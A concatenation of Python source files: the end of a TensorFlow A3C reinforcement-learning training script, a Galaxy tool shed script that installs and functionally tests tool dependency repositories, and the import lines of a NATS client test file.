log_prob = tf.reduce_sum(tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
axis=1, keep_dims=True)
exp_v = log_prob * self.v_target
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob), axis=1,
keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
self.total_loss = self.a_loss#
if OUTPUT_GRAPH and scope=='W_0':
tf.summary.scalar("actor net loss: ", self.a_loss)
#tf.summary.scalar("critic net loss: ", self.c_loss)
self.merged = tf.summary.merge_all()
with tf.name_scope('local_grad'):
#self.com_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/common')
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
#self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
#self.com_grads = tf.gradients(self.total_loss,self.com_params)
self.a_grads = tf.gradients(self.total_loss, self.a_params)
#self.c_grads = tf.gradients(self.total_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
#self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
#self.pull_com_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.com_params, globalAC.com_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params), ACNet.global_step)
#self.update_c_op = OPT_A.apply_gradients(zip(self.c_grads, globalAC.c_params))
#self.update_com_op = OPT_A.apply_gradients(zip(self.com_grads,globalAC.com_params))
def _build_net(self):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
conv1 = tf.layers.conv2d(self.s,32,[3,3],[2,2],kernel_initializer=w_init,activation=tf.nn.relu6,name='conv1')
W = int((WIDTH - 3) / 2 + 1)
conv2 = tf.layers.conv2d(conv1,32,[2,2],[1,1],kernel_initializer=w_init,activation=tf.nn.relu6,name='conv2')
W = int((W-2)/1+1)
FLAT = tf.reshape(conv2,[-1,32*W*W])
#with tf.variable_scope('actor'):
f1 = tf.layers.dense(FLAT,200,kernel_initializer=w_init,activation=tf.nn.relu6,name='f1')
a_prob = tf.layers.dense(f1, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
# with tf.variable_scope('critic'):
# f1 = tf.layers.dense(FLAT,100,kernel_initializer=w_init,activation=tf.nn.relu6,name='f1')
# v = tf.layers.dense(f1,1, kernel_initializer=w_init, name='v') # state value
return a_prob
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op], feed_dict) # local grads applies to global net
if self.scope == "W_0":
result, st = SESS.run([self.merged,ACNet.global_step],feed_dict)
WRITER.add_summary(result, st)
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]), # first digit is batch size, drop it
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.env.env.init_params(show_dashboard=name == 'W_0')
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
# 每100回合保存训练参数
if GLOBAL_EP % 5000 == 0 and RUN_MODE == 'training' and self.name == 'W_0':
saver.save(SESS, ".tf-models/model.ckpt", global_step=GLOBAL_EP)
while True:
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if self.name == 'W_0':
show_interval = GLOBAL_EP+1 % 10000 == 0
nice = GLOBAL_RUNNING_R and GLOBAL_RUNNING_R[-1] >= -10
# if show_interval or nice or RUN_MODE=='execution':
# self.env.render()
#
# time.sleep(0.2)
#
# if done:
# time.sleep(2) # 回合结束给点时间看看效果
# print('>>>>', 's:', s, ' s_:', s_, 'action:', a, ' -- reward:', r, ' -- done:', done, )
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
# 只在训练模式下进行learning
if RUN_MODE == "training" and done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
buffer_v_target)
buffer_s = np.reshape(buffer_s,[-1]+N_S)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
if OUTPUT_GRAPH and self.name =='W_0':
result = SESS.run(self.AC.merged,feed_dict=feed_dict)
global WRITER
WRITER.add_summary(result,GLOBAL_EP)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
# OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
saver = tf.train.Saver()
SESS.run(tf.global_variables_initializer())
# 先加载训练过的参数
# saver.restore(SESS, 'models-ma-balls/a3c-1thread-1v1-dynamic-29900')
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
WRITER = tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
|
functional_tests.py
|
#!/usr/bin/env python
"""
This script cannot be run directly, because it needs to have test/functional/test_toolbox.py in sys.argv in
order to run functional tests on repository tools after installation. The install_and_test_tool_shed_repositories.sh
will execute this script with the appropriate parameters.
"""
import os
import sys
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
sys.path.append( cwd )
new_path = [ os.path.join( cwd, "scripts" ),
os.path.join( cwd, "lib" ),
os.path.join( cwd, 'test' ),
os.path.join( cwd, 'scripts', 'api' ) ]
new_path.extend( sys.path )
sys.path = new_path
from galaxy import eggs
eggs.require( "nose" )
eggs.require( "Paste" )
eggs.require( 'mercurial' )
# This should not be required, but it is under certain conditions thanks to this bug:
# http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import httplib
import install_and_test_tool_shed_repositories.base.test_db_util as test_db_util
import install_and_test_tool_shed_repositories.functional.test_install_repositories as test_install_repositories
import logging
import nose
import random
import re
import shutil
import socket
import tempfile
import time
import threading
import install_and_test_tool_shed_repositories.base.util as install_and_test_base_util
from base.tool_shed_util import parse_tool_panel_config
from galaxy.app import UniverseApplication
from galaxy.util import asbool
from galaxy.util import unicodify
from galaxy.web import buildapp
from functional_tests import generate_config_file
from nose.plugins import Plugin
from paste import httpserver
from functional import database_contexts
log = logging.getLogger( 'install_and_test_tool_dependency_definitions' )
assert sys.version_info[ :2 ] >= ( 2, 6 )
test_home_directory = os.path.join( cwd, 'test', 'install_and_test_tool_shed_repositories', 'tool_dependency_definitions' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the database, new repositories, etc.
galaxy_test_tmp_dir = os.path.join( test_home_directory, 'tmp' )
# File containing information about problematic repositories to exclude from test runs.
exclude_list_file = os.path.abspath( os.path.join( test_home_directory, 'exclude.xml' ) )
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
os.environ[ 'GALAXY_INSTALL_TEST_TMP_DIR' ] = galaxy_test_tmp_dir
# Use separate databases for Galaxy and tool shed install info by default,
# set GALAXY_TEST_INSTALL_DB_MERGED to True to revert to merged databases
# behavior.
default_install_db_merged = False
# This script can be run in such a way that no Tool Shed database records should be changed.
if '-info_only' in sys.argv or 'GALAXY_INSTALL_TEST_INFO_ONLY' in os.environ:
can_update_tool_shed = False
else:
can_update_tool_shed = True
test_framework = install_and_test_base_util.TOOL_DEPENDENCY_DEFINITIONS
def install_and_test_repositories( app, galaxy_shed_tools_dict_file, galaxy_shed_tool_conf_file, galaxy_shed_tool_path ):
# Initialize a dictionary for the summary that will be printed to stdout.
install_and_test_statistics_dict = install_and_test_base_util.initialize_install_and_test_statistics_dict()
error_message = ''
repositories_to_install, error_message = \
install_and_test_base_util.get_repositories_to_install( install_and_test_base_util.galaxy_tool_shed_url, test_framework )
if error_message:
return None, error_message
print 'The exclude list file is defined as %s' % exclude_list_file
if os.path.exists( exclude_list_file ):
print 'Loading the list of repositories excluded from testing from the file %s...' % exclude_list_file
# The following exclude_list will look something like this:
# [{ 'reason': The default reason or the reason specified in this section,
# 'repositories': [( name, owner, changeset_revision if changeset_revision else None ),
# ( name, owner, changeset_revision if changeset_revision else None )]}]
exclude_list_dicts = install_and_test_base_util.parse_exclude_list( exclude_list_file )
else:
print 'The exclude list file %s does not exist, so no repositories will be excluded from testing.' % exclude_list_file
exclude_list_dicts = []
# Generate a test method that will use Twill to install each repository into the embedded Galaxy application that was
# started up, installing repository and tool dependencies. Upon successful installation, generate a test case for each
# functional test defined for each tool in the repository and execute the test cases. Record the result of the tests.
# The traceback and captured output of the tool that was run will be recored for test failures. After all tests have
# completed, the repository is uninstalled, so test cases don't interfere with the next repository's functional tests.
for repository_dict in repositories_to_install:
encoded_repository_metadata_id = repository_dict.get( 'id', None )
# Add the URL for the tool shed we're installing from, so the automated installation methods go to the right place.
repository_dict[ 'tool_shed_url' ] = install_and_test_base_util.galaxy_tool_shed_url
# Get the name and owner out of the repository info dict.
name = str( repository_dict.get( 'name', '' ) )
owner = str( repository_dict.get( 'owner', '' ) )
changeset_revision = str( repository_dict.get( 'changeset_revision', '' ) )
print "Processing revision %s of repository %s owned by %s..." % ( changeset_revision, name, owner )
repository_identifier_tup = ( name, owner, changeset_revision )
install_and_test_statistics_dict[ 'total_repositories_processed' ] += 1
# Retrieve the stored list of tool_test_results_dicts.
tool_test_results_dicts, error_message = \
install_and_test_base_util.get_tool_test_results_dicts( install_and_test_base_util.galaxy_tool_shed_url,
encoded_repository_metadata_id )
if error_message:
print 'Cannot install version %s of repository %s owned by %s due to the following error getting tool_test_results:\n%s' % \
( changeset_revision, name, owner, str( error_message ) )
else:
tool_test_results_dict = install_and_test_base_util.get_tool_test_results_dict( tool_test_results_dicts )
is_excluded, reason = install_and_test_base_util.is_excluded( exclude_list_dicts,
name,
owner,
changeset_revision,
encoded_repository_metadata_id )
if is_excluded:
# If this repository is being skipped, register the reason.
print "Not testing revision %s of repository %s owned by %s because it is in the exclude list for this test run." % \
( changeset_revision, name, owner )
tool_test_results_dict[ 'not_tested' ] = dict( reason=reason )
params = dict( do_not_test=False )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
else:
# See if the repository was installed in a previous test.
repository = install_and_test_base_util.get_repository( name, owner, changeset_revision )
if repository is None:
# The repository was not previously installed, so install it now.
start_time = time.time()
tool_test_results_dict = install_and_test_base_util.initialize_tool_tests_results_dict( app, tool_test_results_dict )
repository, error_message = install_and_test_base_util.install_repository( app, repository_dict )
if error_message:
# The repository installation failed.
print 'Installation failed for revision %s of repository %s owned by %s.' % ( changeset_revision, name, owner )
processed_repositories_with_installation_error = \
install_and_test_statistics_dict.get( 'repositories_with_installation_error', [] )
if repository_identifier_tup not in processed_repositories_with_installation_error:
install_and_test_statistics_dict[ 'repositories_with_installation_error' ].append( repository_identifier_tup )
current_repository_installation_error_dict = dict( tool_shed=install_and_test_base_util.galaxy_tool_shed_url,
name=name,
owner=owner,
changeset_revision=changeset_revision,
error_message=error_message )
tool_test_results_dict[ 'installation_errors' ][ 'current_repository' ].append( current_repository_installation_error_dict )
params = dict( test_install_error=True,
do_not_test=False )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
else:
# The repository was successfully installed.
print 'Installation succeeded for revision %s of repository %s owned by %s.' % \
( changeset_revision, name, owner )
# Populate the installation containers (success and error) for the repository's immediate dependencies
# (the entire dependency tree is not handled here).
params, install_and_test_statistics_dict, tool_test_results_dict = \
install_and_test_base_util.populate_dependency_install_containers( app,
repository,
repository_identifier_tup,
install_and_test_statistics_dict,
tool_test_results_dict )
install_and_test_base_util.save_test_results_for_changeset_revision( install_and_test_base_util.galaxy_tool_shed_url,
tool_test_results_dicts,
tool_test_results_dict,
repository_dict,
params,
can_update_tool_shed )
# Populate the installation containers (success or error) for the repository's immediate repository
# dependencies whose containers are not yet populated.
install_and_test_base_util.populate_install_containers_for_repository_dependencies( app,
repository,
encoded_repository_metadata_id,
install_and_test_statistics_dict,
can_update_tool_shed )
print '\nAttempting to install revision %s of repository %s owned by %s took %s seconds.\n' % \
( changeset_revision, name, owner, str( time.time() - start_time ) )
else:
print 'Skipped attempt to install revision %s of repository %s owned by %s because ' % \
( changeset_revision, name, owner )
print 'it was previously installed and currently has status %s' % repository.status
return install_and_test_statistics_dict, error_message
def main():
if install_and_test_base_util.tool_shed_api_key is None:
# If the tool shed URL specified in any dict is not present in the tool_sheds_conf.xml, the installation will fail.
log.debug( 'Cannot proceed without a valid tool shed API key set in the enviroment variable GALAXY_INSTALL_TEST_TOOL_SHED_API_KEY.' )
return 1
if install_and_test_base_util.galaxy_tool_shed_url is None:
log.debug( 'Cannot proceed without a valid Tool Shed base URL set in the environment variable GALAXY_INSTALL_TEST_TOOL_SHED_URL.' )
return 1
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_INSTALL_TEST_HOST', install_and_test_base_util.default_galaxy_test_host )
# Set the GALAXY_INSTALL_TEST_HOST variable so that Twill will have the Galaxy url to which to
# install repositories.
os.environ[ 'GALAXY_INSTALL_TEST_HOST' ] = galaxy_test_host
# Set the GALAXY_TEST_HOST environment variable so that the toolbox tests will have the Galaxy url
# on which to to run tool functional tests.
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
galaxy_test_port = os.environ.get( 'GALAXY_INSTALL_TEST_PORT', str( install_and_test_base_util.default_galaxy_test_port_max ) )
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
galaxy_test_file_dir = os.environ.get( 'GALAXY_INSTALL_TEST_FILE_DIR', default_galaxy_test_file_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.abspath( galaxy_test_file_dir )
use_distributed_object_store = os.environ.get( 'GALAXY_INSTALL_TEST_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( galaxy_test_tmp_dir ):
os.mkdir( galaxy_test_tmp_dir )
# Set up the configuration files for the Galaxy instance.
galaxy_shed_tool_path = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_PATH',
tempfile.mkdtemp( dir=galaxy_test_tmp_dir, prefix='shed_tools' ) )
shed_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_data_table_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_TABLE_CONF',
install_and_test_base_util.tool_data_table_conf )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_job_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_MIGRATED_TOOL_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_tool_sheds_conf.xml' ) )
galaxy_shed_tools_dict_file = os.environ.get( 'GALAXY_INSTALL_TEST_SHED_TOOL_DICT_FILE',
os.path.join( galaxy_test_tmp_dir, 'shed_tool_dict' ) )
install_and_test_base_util.populate_galaxy_shed_tools_dict_file( galaxy_shed_tools_dict_file,
shed_tools_dict=None )
# Set the GALAXY_TOOL_SHED_TEST_FILE environment variable to the path of the shed_tools_dict file so that
# test.base.twilltestcase.setUp will find and parse it properly.
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_shed_tools_dict_file
if 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DATA_PATH' ] = tool_data_path
# Configure the database connection and path.
if 'GALAXY_INSTALL_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_INSTALL_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to install and test tools.
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
new_repos_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Set up the tool dependency path for the Galaxy instance.
tool_dependency_dir = os.environ.get( 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR', None )
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
os.environ[ 'GALAXY_INSTALL_TEST_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
os.environ[ 'GALAXY_TOOL_DEPENDENCY_DIR' ] = tool_dependency_dir
if 'GALAXY_INSTALL_TEST_DBURI' in os.environ:
database_connection = os.environ[ 'GALAXY_INSTALL_TEST_DBURI' ]
else:
database_connection = 'sqlite:///' + os.path.join( galaxy_db_path, 'install_and_test_repositories.sqlite' )
if 'GALAXY_INSTALL_TEST_INSTALL_DBURI' in os.environ:
install_database_connection = os.environ[ 'GALAXY_INSTALL_TEST_INSTALL_DBURI' ]
elif asbool( os.environ.get( 'GALAXY_TEST_INSTALL_DB_MERGED', default_install_db_merged ) ):
install_database_connection = database_connection
else:
install_galaxy_db_path = os.path.join( galaxy_db_path, 'install.sqlite' )
install_database_connection = 'sqlite:///%s' % install_galaxy_db_path
kwargs = {}
for dir in [ galaxy_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Database connection: ", database_connection
print "Install database connection: ", install_database_connection
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( install_and_test_base_util.tool_data_table_conf_xml_template )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Start up a Galaxy instance ------------------------------------------------------
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( install_and_test_base_util.tool_conf_xml )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( install_and_test_base_util.job_conf_xml )
# Generate the tool_sheds_conf.xml file, but only if a the user has not specified an existing one in the environment.
if 'GALAXY_INSTALL_TEST_TOOL_SHEDS_CONF' not in os.environ:
file( galaxy_tool_sheds_conf_file, 'w' ).write( install_and_test_base_util.tool_sheds_conf_xml )
# Generate the shed_tool_conf.xml file.
install_and_test_base_util.populate_shed_conf_file( galaxy_shed_tool_conf_file, galaxy_shed_tool_path, xml_elems=None )
os.environ[ 'GALAXY_INSTALL_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate the migrated_tool_conf.xml file.
install_and_test_base_util.populate_shed_conf_file( galaxy_migrated_tool_conf_file, galaxy_migrated_tool_path, xml_elems=None )
# Write the embedded web application's specific configuration to a temporary file. This is necessary in order for
# the external metadata script to find the right datasets.
kwargs = dict( admin_users = '[email protected]',
master_api_key = install_and_test_base_util.default_galaxy_master_api_key,
allow_user_creation = True,
allow_user_deletion = True,
allow_library_path_paste = True,
database_connection = database_connection,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
file_path = galaxy_file_path,
id_secret = install_and_test_base_util.galaxy_encode_secret,
install_database_connection = install_database_connection,
job_config_file = galaxy_job_conf_file,
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests = True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_config_file = ','.join( [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ] ),
tool_data_path = tool_data_path,
tool_dependency_dir = tool_dependency_dir,
tool_path = tool_path,
tool_parse_help = False,
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False )
if os.path.exists( galaxy_tool_data_table_conf_file ):
kwargs[ 'tool_data_table_config_path' ] = galaxy_tool_data_table_conf_file
galaxy_config_file = os.environ.get( 'GALAXY_INSTALL_TEST_INI_FILE', None )
# If the user has passed in a path for the .ini file, do not overwrite it.
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'install_test_tool_shed_repositories_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
kwargs[ 'tool_config_file' ] = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ]
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = install_and_test_base_util.get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
# ---- Build Galaxy Application --------------------------------------------------
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
kwargs[ 'config_file' ] = galaxy_config_file
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
log.debug( "Embedded Galaxy application started..." )
# ---- Run galaxy webserver ------------------------------------------------------
server = None
global_conf = install_and_test_base_util.get_webapp_global_conf()
global_conf[ 'database_file' ] = database_connection
webapp = buildapp.app_factory( global_conf,
use_translogger=False,
static_enabled=install_and_test_base_util.STATIC_ENABLED,
app=app )
# Serve the app on a specified or random port.
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( install_and_test_base_util.default_galaxy_test_port_min,
install_and_test_base_util.default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s", galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( install_and_test_base_util.default_galaxy_test_port_min, install_and_test_base_util.default_galaxy_test_port_max ) )
os.environ[ 'GALAXY_INSTALL_TEST_PORT' ] = galaxy_test_port
# Start the server.
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up.
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
print "Embedded galaxy web server started..."
print "The embedded Galaxy application is running on %s:%s" % ( galaxy_test_host, galaxy_test_port )
print "Repositories will be installed from the tool shed at %s" % install_and_test_base_util.galaxy_tool_shed_url
# If a tool_data_table_conf.test.xml file was found, add the entries from it into the app's tool data tables.
if install_and_test_base_util.additional_tool_data_tables:
app.tool_data_tables.add_new_entries_from_config_file( config_filename=install_and_test_base_util.additional_tool_data_tables,
tool_data_path=install_and_test_base_util.additional_tool_data_path,
shed_tool_data_table_config=None,
persist=False )
now = time.strftime( "%Y-%m-%d %H:%M:%S" )
print "####################################################################################"
print "# %s - installation script for repositories of type tool_dependency_definition started." % now
if not can_update_tool_shed:
print "# This run will not update the Tool Shed database."
print "####################################################################################"
install_and_test_statistics_dict, error_message = install_and_test_repositories( app,
galaxy_shed_tools_dict_file,
galaxy_shed_tool_conf_file,
galaxy_shed_tool_path )
try:
install_and_test_base_util.print_install_and_test_results( 'tool dependency definitions',
install_and_test_statistics_dict,
error_message )
except Exception, e:
log.exception( 'Attempting to print the following dictionary...\n\n%s\n\n...threw the following exception...\n\n%s\n\n' % \
( str( install_and_test_statistics_dict ), str( e ) ) )
log.debug( "Shutting down..." )
# Gracefully shut down the embedded web server and UniverseApplication.
if server:
log.debug( "Shutting down embedded galaxy web server..." )
server.server_close()
server = None
log.debug( "Embedded galaxy server stopped..." )
if app:
log.debug( "Shutting down galaxy application..." )
app.shutdown()
app = None
log.debug( "Embedded galaxy application stopped..." )
# Clean up test files unless otherwise specified.
if 'GALAXY_INSTALL_TEST_NO_CLEANUP' not in os.environ:
for dir in [ galaxy_test_tmp_dir ]:
if os.path.exists( dir ):
try:
shutil.rmtree( dir )
log.debug( "Cleaned up temporary files in %s", str( dir ) )
except:
pass
else:
log.debug( 'GALAXY_INSTALL_TEST_NO_CLEANUP set, not cleaning up.' )
# Return a "successful" response to buildbot.
return 0
if __name__ == "__main__":
# The tool_test_results_dict should always have the following structure:
# {
# "test_environment":
# {
# "galaxy_revision": "9001:abcd1234",
# "galaxy_database_version": "114",
# "tool_shed_revision": "9001:abcd1234",
# "tool_shed_mercurial_version": "2.3.1",
# "tool_shed_database_version": "17",
# "python_version": "2.7.2",
# "architecture": "x86_64",
# "system": "Darwin 12.2.0"
# },
# "successful_installation":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'installation_directory': 'The installation directory path.'
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.'
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.'
# },
# ],
# }
# "installation_errors":
# {
# 'tool_dependencies':
# [
# {
# 'type': 'Type of tool dependency, e.g. package, set_environment, etc.',
# 'name': 'Name of the tool dependency.',
# 'version': 'Version if this is a package, otherwise blank.',
# 'error_message': 'The error message returned when installation was attempted.',
# },
# ],
# 'repository_dependencies':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# 'current_repository':
# [
# {
# 'tool_shed': 'The tool shed that this repository was installed from.',
# 'name': 'The name of the repository that failed to install.',
# 'owner': 'Owner of the failed repository.',
# 'changeset_revision': 'Changeset revision of the failed repository.',
# 'error_message': 'The error message that was returned when the repository failed to install.',
# },
# ],
# }
# }
sys.exit( main() )
|
client_test.py
|
import sys
import unittest
import tornado.httpclient
import tornado.concurrent
import tornado.testing
import tornado.gen
import tornado.ioloop
import tornado.iostream
import tornado.tcpserver
import subprocess
import threading
import tempfile
import time
import json
import socket
import ssl
import os
from datetime import timedelta
from collections import defaultdict as Hash
from nats.io import Client
from nats.io import Client as NATS
from nats.io.errors import *
from nats.io.utils import new_inbox, INBOX_PREFIX
from nats.protocol.parser import *
